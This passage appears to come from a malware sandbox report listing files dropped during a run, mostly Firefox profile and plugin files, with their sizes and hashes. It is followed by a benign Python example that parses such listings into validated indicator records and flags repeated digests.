SHA51209db2ae8562f93b187e381582683e11fd656471508b9fdeea41a3b2a7f303bdabe21ec3eb237faf9e580b8185f8d51bcec8ba516881f31bc8e902c46e4989c0f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\db\data.safe.tmp
Filesize7KB
MD56bcb525ccf99d795be4088db4e7d1f6e
SHA1efc47f1add4af2699c312b354fa0e42ab8025f88
SHA2560167d44a4f2594c348ea43b69e83785cd4788cb566453e9bb0bb315891fe8f84
SHA512c61930d48aa35e002990479c70028e06d1d8a3d006314f4f6813d81dceef4c65f4f9f059d108f62a5cc44c20874d598a4d7151a3bf6a39cf510fe7dcee5bd2d2
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\db\data.safe.tmp
Filesize49KB
MD50ef87158f7a4d4f778c118630845dc66
SHA1e06f5c81a032ec9dcff4a782d0fc38b9a254590a
SHA256ba94557ae93f89d1aca71dd9443594e247b76519575135fd3e93b2fc0773c151
SHA51201193f8a854b0f94bb473200f03a252cb318d714aae360e91c68afc1f59211844309dfece9c800c200235adf27cda3fa1197447a2132734846a585a3260d7344
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\db\data.safe.tmp
Filesize49KB
MD56081c83245162206968058b2095ae4b2
SHA1f87ca811ff4629e92b86839a9d9645ac4a7b9430
SHA256b41e5ee2f7daec9ec0d1f17aa78d67b7a6d3c0c7473585f3c2fcffb26cbe6f8f
SHA5127fb2c12aaa1773b3136c4a7a971b128cad36b310e3d57af6e4405d6c564a54bd7643ca2c6bbacf52d9e57aec14a276f3e400126fa75c14794f692883f30714b5
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\db\data.safe.tmp
Filesize49KB
MD5a3366bca487389aa889bbe5f3ca01651
SHA1d7339f21803af7a14ca39d218ba568d4425de265
SHA256d7617160fddc3a552485a5bed17ce4fcae057c2ff198b78444baea9ceed9fe7d
SHA512a573397b06ece20d8888a94c9cf12d168732a24c1ff2137504bf6fe0ac4699c6ead0c00b20abe0871fa1986211f96fb6b7ac4f969b414e0ff3c5d46c92c14982
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\db\data.safe.tmp
Filesize49KB
MD55e32d282bc6c492616028e78124e23a3
SHA1f629be91119b438a0d61fe34edd6170b5fb4e293
SHA256f3f965a0228e842ff032f13205c82eb100cc53708bbe1245aa829f9a10c84616
SHA512360fbfce78004a8ce0143acb43f3629b46498f6d99b6ae9d78563af29862d1ece24e8a28607a1c6c766e52aef0c96e4a56cd680d3b762a3457379d535842f729
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\db\data.safe.tmp
Filesize6KB
MD57ab8dd90242c32a7323c3df37c125881
SHA16e55bd72fa5bfe3612798641d111dea4573ae65e
SHA2569156d42005f07edba6afd7ccc504367e3bee8c3c89b664fc60fe0f1d4d836548
SHA51267269f58ee8b72806818481676f65f40ea23116204a4571f0c26cf89f2eae44c71abc01fc8fed80dc69dab7162804d71bb783ec9672b7a9e565add386a2a5975
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\events\events
Filesize1KB
MD5cb8ec9873186a328193b46cfa2d58e92
SHA1df782ada7d10f0b31e183a8f8484d2c4f2bef1ee
SHA256f548b59073f5063d4ff2fd8dea423160af2f4080ffa9fef77ae9e6ed80e91cef
SHA512aaa5a91d0eeb525e73a4d2f8836727e7f1ddc94e3bf9547839e9449349465f149c63e7ac6af2ed126c7b6bb68a3f44dec2939fe8f26b1e7d438df26ddf4d29ab
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\pending_pings\28656ac7-d6eb-4156-8c17-f4013db62443
Filesize16KB
MD543a71c15bdb35a7d5f087fce0b9e9715
SHA157bf3384490b764cea4b544333074c68c9d7ae6e
SHA2565dea3670445f73add603bc76f979ab344b349541409193670230b7b5b6ed84b0
SHA5124c39c7362653532c94c87de67598d39495f02f3b99e4808695d4df04d9526de90eacfa43274711ca4f43264f6b46e084bfdba875c077413d82ec600167dfcb0e
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\pending_pings\693ea712-f511-4864-83d6-5d001f3fd358
Filesize883B
MD5b31a843c8e36097d26274bf022d9f23a
SHA1f237c73761e906a8e355a5633d5f94bf53096af9
SHA256c15fb16093476d2795fc5bdca8099912e9150be0231264b20a3f7c5b9f849139
SHA51208b605d8ccb9df0fadc50d7b5febcd92c292a486527324c3ea7a0a6cb39db404db28cc4eed9b3c91c8ae9ce2d36c6ce0ce5cef4be0fd2dd1a878d038a86c0e51
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\pending_pings\77ceb980-50a2-454e-9dcc-3f07c796ced5
Filesize235B
MD552f7c1997dc692cda399348138299317
SHA1699a6b839b08cb37846bf76416b8d44f142f82f3
SHA25685853bd06e2b3d93d43a48c69e3fca765ac26683fe3aa1e20aeec24744e1d169
SHA512abd1d750af61399ee7a05c32a78b1d18382486020a4d9d2c7cfc60128465d746848a62809449983fc757a1df60b313afb052f6b49190aac574c44a182309ffdf
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\pending_pings\9aa17b84-e416-4bf4-ad47-b67bd4a62c2d
Filesize235B
MD57a5f1c420e1fa5adcc2fdf408942287b
SHA12f0947536a59a4f506cbab13bf7fb2c2c0a526ec
SHA256e3284cd68b70678e209912e3da223e6041db9f62969902448e60691d219b4698
SHA51209897f7fa388592408bacca8381a0a53fb8b3bf18b1a7b6f37231a53f01da8debe577051014ab0b983f362f45f9caa428e6a13c85b81392ace1f0212e101780f
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\pending_pings\a137e195-66b0-4193-b590-de59a3c1704a
Filesize2KB
MD5a4a0a451949500683219c52239cbef1f
SHA1d012ff0930665c6c31533e48beb647c96ace0506
SHA256f2a880bbcc6db8e3f94d3bbb4446031aefd797eda6386ce8be0ccb0722ff1fdf
SHA5120b789ab8946494b803fd3145f411e4cd1828d01ba80434b3e20d4e4b44c32eb99f17d812534f0f3ad900d7a4566c43fc19b194afc297eace4ca75fda72e6a152
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\datareporting\glean\pending_pings\a606604f-da2d-4e31-8d04-fd437e797101
Filesize886B
MD5388ae041f90b3af4bc4557e4ac9a3e5e
SHA1c7cdf76a44c97b3f36e4c12179c8d0a5aca2c4ec
SHA256ff3ef27e50104b8629bbf20d6d2eb9e4c547f005a69909ac47a211a6531c4c42
SHA512c001971d5e505acaf4823a0cc31773a3a48916d9e802915bc36889db23c99025dd43d4716ff4d069bbcd3452a802782de08facb47e5b76dbf6642b8b9b3a5c40
-
Filesize
16KB
MD5254943f025f29c98c1b14e34fe2a8f62
SHA1db98d1b1efa6135e86f46b9a7228b8e1f1a079d7
SHA25640079210924f54eebfbf1d7ead4c42d6a75cc2311791bfab7da7a47fe7711bb6
SHA5120ffa8f5ebd8e2dcf4551fd5d9045802313eee6168afe1a5665d6a8965b1ac2f83d1ab03d4890a74935eb83772fdf91d2fd9d71a6f2161a38c31ba93051c3c8cc
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.dll
Filesize965KB
MD5f7c1b3eaee11b0a498998b485782aebe
SHA1786f7091a2a2551117adac032f2622c815e14c06
SHA25684a9cc998bc517598a90ccd02a104cb9eb2bbd2feed56de83fc8c2a11c033b76
SHA512f30d3b320ca9f86a4dcebf9cd210f133147c66105fdaa4a6661eee50b4269b262411772f2b6a4823b4feff1398e2f5e5fc68c7f7a72621e71b6ef693160b4731
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\gmp-gmpopenh264\2.6.0\gmpopenh264.info
Filesize116B
MD5ae29912407dfadf0d683982d4fb57293
SHA10542053f5a6ce07dc206f69230109be4a5e25775
SHA256fe7686a6281f0ab519c32c788ce0da0d01640425018dcffcfcb81105757f6fe6
SHA5126f9083152c02f93a900cb69b1ce879e0c0d69453f1046280ca549a0301ae7925facdda6329f7ccb61726addee78ba2fffc5ba3491a185f139f3155716caf0a8d
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\gmp-widevinecdm\4.10.2891.0\LICENSE.tmp
Filesize473B
MD5f6719687bed7403612eaed0b191eb4a9
SHA1dd03919750e45507743bd089a659e8efcefa7af1
SHA256afb514e4269594234b32c873ba2cd3cc8892e836861137b531a40a1232820c59
SHA512dd14a7eae05d90f35a055a5098d09cd2233d784f6ac228b5927925241689bff828e573b7a90a5196bfdd7aaeecf00f5c94486ad9e3910cfb07475fcfbb7f0d56
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\gmp-widevinecdm\4.10.2891.0\manifest.json
Filesize1001B
MD532aeacedce82bafbcba8d1ade9e88d5a
SHA1a9b4858d2ae0b6595705634fd024f7e076426a24
SHA2564ed3c6389f6f7cd94db5cd0f870c34a296fc0de3b1e707fccf01645b455790ce
SHA51267dfe5632188714ec87f3c79dbe217a0ae4dfb784f3fac63affd20fef8b8ef1978c28b3bf7955f3daaf3004ac5316b1ffa964683b0676841bab4274c325c6e2b
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\gmp-widevinecdm\4.10.2891.0\widevinecdm.dll
Filesize611KB
MD56638247d43a12e78ea48136372e09448
SHA1aa39da65642c7a7ebd7045a9a9161139ac0d93bd
SHA256228c05ec379c7ea906d3476b0a24b52e73aa3b3cc433930e59c59ea3b9fd18ce
SHA51207a24fe2ff66b2cf5d1fe3b611fd5c0df88c4d3e1e091867409e11bb0a5a2683987b56c279a384ce95d6f8fd8e00bbe4149e6baaef59f2f13f9ca0be8b3ebf84
-
Filesize
8KB
MD5f6001e7f340d3a82e952349dd406a0a2
SHA1e4417d042529d1901492c9541e1d4cde13db52cf
SHA25632bfe1abd36f80057fc1ca8225bd8d4572b0c1129fd72abfc97911ad918f57b5
SHA512c02316e5dde4c0323980a56828dc85478091cedad74334a457e82d53cf7b2f5e8ee852d739b74b129ae13a9396f1533849fc4a55f15c99139ec008dd4513532f
-
Filesize
6KB
MD5147d6ca5aae4aad10bc2b8d751e5db67
SHA194f69105b6e6b224e78a271ac0bde5df659dff2c
SHA256ce1856ec3b0b846529621aa327a7478999909e7763cc8974c33ef1fc8bd334e3
SHA512f29ec64d0b01a6a1792d7b0e330cd635bf1303ad8539528a09aef236b83d3cbc6a77efaa5373d50ac085dbad4042866de38a0bb80a4f6ac1e8fe05192ede5ab6
-
Filesize
6KB
MD5552c1f7ac8a686ff929179f2d6419ba0
SHA15f95159f93a86f8204bcd696578ca7d7cea3741d
SHA256bf24ffbdd9597ad60b9b25f13dae3dee021ccc2c2029d8d214edae1fc4490f0a
SHA512eac1c4e5cdc0d2624e1f907fba6361880ee68e2a596db061c8812908aba9341a4f3cffdfced40714ca3d2da491bb37623fcaef75ab744477d71e80730e928bbb
-
Filesize
6KB
MD529833a1faedaf7e55d3f2f41824e271d
SHA1d79a4e1276caaaa87174a8c9fe430d51f92c3619
SHA256607d81ca789b0432d00fb5c7d47ff3dbb868bdc4935de36bd9cb0c67c8c12189
SHA512d6f08ed76e7f102434dc4d2130bd4101049964cabfcebea638cbf0b10b0dd89f489f114bef36d117823106ad69f0c81dc12135f5ceccdd0ffaf903a9d9d56bc4
-
C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\9z25oblb.default-release\sessionstore-backups\recovery.jsonlz4
Filesize1KB
MD55c2872913c40687e693870226daf2172
SHA15443f35b892fc70d990d6f70cbda17ca8f72100f
SHA2567c142c1526bd2c13010f118b4f0cfb46fb29be09c341bb86d01da581d5da0b3b
SHA5128d20f895df75c1141e4e8f01c1bc62a11432e501bc5ebb03765f68c103497039a0b0bad455591b99c6c456d53ef440b0c761e5ca2ee94274890840e408941729
-
Filesize
355KB
MD59cfe1ced0752035a26677843c0cbb4e3
SHA1e8833ac499b41beb6763a684ba60333cdf955918
SHA2563bdb393dfaa63b9650658d9288a1dc9a62acc0d44c2f5eab9170485356b9b634
SHA51229e912e7e19f5ca984fb36fc38df87ed9f8eaa1b62fd0c21d75cbc7b7f16a441de3a97c40a813a8989953ff7c4045d6173066be2a6e6140c90325546b3d0773c
-
Filesize
199KB
MD5424b93cb92e15e3f41e3dd01a6a8e9cc
SHA12897ab04f69a92218bfac78f085456f98a18bdd3
SHA256ccb99a2eeb80cd74cc58691e7af7fce3264b941aea3d777d9e4a950b9e70b82e
SHA51215e984a761d873eef0ab50f8292fbba771208ff97a57b131441666c6628936c29f8b1f0e04ef8e880f33ef6fccebd20db882997ca3504c9e5ea1db781b9ffb0f
-
Filesize
260KB
MD566522d67917b7994ddfb5647f1c3472e
SHA1f341b9b28ca7ac21740d4a7d20e4477dba451139
SHA2565da15bcd1ad66b56b73994a073e8f0ff4170b9ed09c575ca1b046a59a01cc8a1
SHA512921babab093c5bd1e0ec1615c8842081b402a491ecc744613929fa5fafde628cd9bcc1b38b70024a8fa4317aea0b0dce71cd19f44103e50d6ed7a8d9e2a55968
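For triage, the dropped-file listing above is most useful as a machine-readable set of indicators. The Python below is an example added here, not part of the sandbox report or its tooling. It parses the report's own layout: an optional `C:\...` path line, a `Filesize` line (either fused with its value, as in `Filesize695B`, or split over two lines), four digest lines whose label is fused to the hex value, and a lone `-` separator. It validates every digest length, keeps path-less entries path-less rather than guessing a location, and reports digests that recur across entries. The first two records of the constructed input are copied from the listing above (the path-less 1.8MB entry and the `.cmd` file under `Temp`); the `constructed-copy.exe` and `constructed-bad.bin` entries are made up to exercise duplicate detection and the validation path.

```python
"""Parse a sandbox "dropped files" listing into validated IOC records.

Example code added alongside the report, not the sandbox's own parser.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional

# Expected hex length per digest label; anything else is a copy or extraction error.
DIGEST_LEN = {"MD5": 32, "SHA1": 40, "SHA256": 64, "SHA512": 128}

# Longest label first so a "SHA512..." line is never read as a short "SHA1" label.
_DIGEST_RE = re.compile(r"^(SHA512|SHA256|SHA1|MD5)\s*([0-9A-Fa-f]+)$")
_SIZE_RE = re.compile(r"^Filesize\s*(\d+(?:\.\d+)?\s*[KMG]?B)?$")
_PATH_RE = re.compile(r"^[A-Za-z]:\\")


@dataclass
class DroppedFile:
    path: Optional[str] = None          # None when the report gives no path
    size: Optional[str] = None
    digests: Dict[str, str] = field(default_factory=dict)
    errors: List[str] = field(default_factory=list)


def parse_listing(text: str) -> List[DroppedFile]:
    """Split the listing on '-' separators and tolerate both Filesize layouts."""
    entries: List[DroppedFile] = []
    cur = DroppedFile()
    pending_size = False  # a bare "Filesize" line; the value is on the next line
    for raw in text.splitlines():
        line = raw.strip()
        if not line:
            continue
        if line == "-":
            if cur.digests or cur.path:
                entries.append(cur)
            cur, pending_size = DroppedFile(), False
            continue
        if pending_size:
            cur.size, pending_size = line, False
            continue
        if _PATH_RE.match(line):
            cur.path = line
            continue
        m = _SIZE_RE.match(line)
        if m:
            if m.group(1):
                cur.size = m.group(1)
            else:
                pending_size = True
            continue
        m = _DIGEST_RE.match(line)
        if m:
            label, value = m.group(1), m.group(2).lower()
            if len(value) != DIGEST_LEN[label]:
                cur.errors.append(f"{label} has {len(value)} hex chars, expected {DIGEST_LEN[label]}")
            cur.digests[label] = value
            continue
        cur.errors.append(f"unrecognised line: {line!r}")
    if cur.digests or cur.path:
        entries.append(cur)
    return entries


def duplicate_digests(entries: List[DroppedFile], label: str = "SHA256") -> Dict[str, List[int]]:
    """Map each digest seen in more than one entry to the indices of those entries."""
    seen: Dict[str, List[int]] = {}
    for i, e in enumerate(entries):
        d = e.digests.get(label)
        if d:
            seen.setdefault(d, []).append(i)
    return {d: idx for d, idx in seen.items() if len(idx) > 1}


# Constructed input in the report's layout. Entries 1 and 2 are copied from the
# listing above; entry 3 is a made-up second location carrying the same digests
# (duplicate detection) and entry 4 is made up with a truncated SHA256 (validation).
SAMPLE_LISTING = r"""
Filesize
1.8MB
MD5442fc32065555d167806a2a766454b88
SHA110882938da5aed6fe9e2d7df16919aca6e849eff
SHA25661260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9
SHA512c19e959174d1e266302d782ffb43ffdd891387c4121fa5949f20b6e7d932326f76a972c0bb55cdb4cf51bb49987cd69426100e745f20def59d90fa73add80fe7
-
C:\Users\Admin\AppData\Local\Temp\{ff499140-fbb0-4a6a-8812-a68293f59bd9}\61a99688-3ceb-422b-89c3-50229b6b9c76.cmd
Filesize695B
MD5f4664a90bd29ecffa955e5169c9bd809
SHA1f55b625be0f8bd880b312277e3533a87bc9c8a4b
SHA256b4423ce6bfa5bdab25b49228e1312f2cf1d450363c10c573da10f49d51a5905e
SHA51239c797f58b5e586d2a5efa06fb1314b1a67a0397c916719a93dcadeaf73f739df53c6731a8066adf3048314a0d344ee787d2dc6c0f79ebc9307f6b66669e3547
-
C:\Users\Admin\AppData\Local\Temp\constructed-copy.exe
Filesize
1.8MB
MD5442fc32065555d167806a2a766454b88
SHA110882938da5aed6fe9e2d7df16919aca6e849eff
SHA25661260d7384abdbdf1ca775670bc8c19a0fae83b36f5c45913f8309fe15ce2af9
SHA512c19e959174d1e266302d782ffb43ffdd891387c4121fa5949f20b6e7d932326f76a972c0bb55cdb4cf51bb49987cd69426100e745f20def59d90fa73add80fe7
-
C:\Users\Admin\AppData\Local\Temp\constructed-bad.bin
Filesize12B
MD500000000000000000000000000000000
SHA256deadbeef
-
"""


def summarize(text: str = SAMPLE_LISTING) -> dict:
    """One-shot view: entry count, path-less entries, entries with errors, repeated digests."""
    entries = parse_listing(text)
    return {
        "count": len(entries),
        "without_path": sum(1 for e in entries if e.path is None),
        "with_errors": [i for i, e in enumerate(entries) if e.errors],
        "duplicates": duplicate_digests(entries),
    }


if __name__ == "__main__":
    print(summarize())
```

Two checks matter before these hashes go into a blocklist: a digest of the wrong length is a transcription error, not an indicator, and the parser refuses to silently accept it; and the same digest under several paths means the same bytes were written more than once, which is worth a look on its own since a dropper staging a copy of itself shows up exactly this way. Entries the report lists without a path are kept as path-less records; the example does not invent a location for them.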